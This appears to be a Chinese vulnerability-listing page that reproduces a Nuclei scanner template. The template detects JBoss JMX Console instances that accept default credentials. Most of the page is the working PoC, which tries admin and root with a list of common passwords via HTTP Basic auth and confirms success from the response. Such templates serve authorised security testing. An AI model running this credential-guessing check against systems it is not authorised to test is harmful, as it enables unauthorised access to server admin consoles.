jmx-default-login: JBoss JMX Console Weak Credential Discovery

日期: 2025-08-01 | 影响软件: JBoss JMX Console | POC: 已公开

漏洞描述

JBoss JMX Console default login information was discovered.

PoC代码[已公开]

id: jmx-default-login

info:
  name: JBoss JMX Console Weak Credential Discovery
  author: paradessia
  severity: high
  description: JBoss JMX Console default login information was discovered.
  reference:
    - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 28
  tags: jboss,jmx,default-login,vuln

http:
  - raw:
      - |
        GET /jmx-console/ HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /jmx-console/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(user + ':' + pass)}}

    attack: clusterbomb
    payloads:
      user:
        - admin
        - root
      pass:
        - admin
        - 12345
        - 123456
        - 1234
        - 123456789
        - 123qwe
        - root

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(body_1, 'JMImplementation') && contains(body_2, 'JMImplementation')"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205de2ae2c7b89ce46ebee6334ad9a76f9794b6b99fb32cdc4c62f3d0329032689022100acd64586a3f568e31f2cb974a4ed19d453697e6ff1d202961e4774d1bcad9f71:922c64590222798bb761d5b6d8e72950

相关漏洞推荐